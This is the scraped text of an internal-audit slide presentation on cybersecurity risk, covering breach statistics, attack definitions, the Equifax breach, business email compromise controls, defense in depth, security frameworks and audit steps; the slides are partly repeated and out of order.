bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitions
bull What are some emerging cybersecurity trends and threats
bull What happened with some recent high-profile cybersecurity attacks
bull What are some cybersecurity roadblocks
bull What steps can Internal Audit take to evaluate your companyrsquos cybersecurity risk level
bull What can a Non-Technical Auditor do to evaluate your companyrsquos cybersecurity health
LEARNING OBJECTIVES
3
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
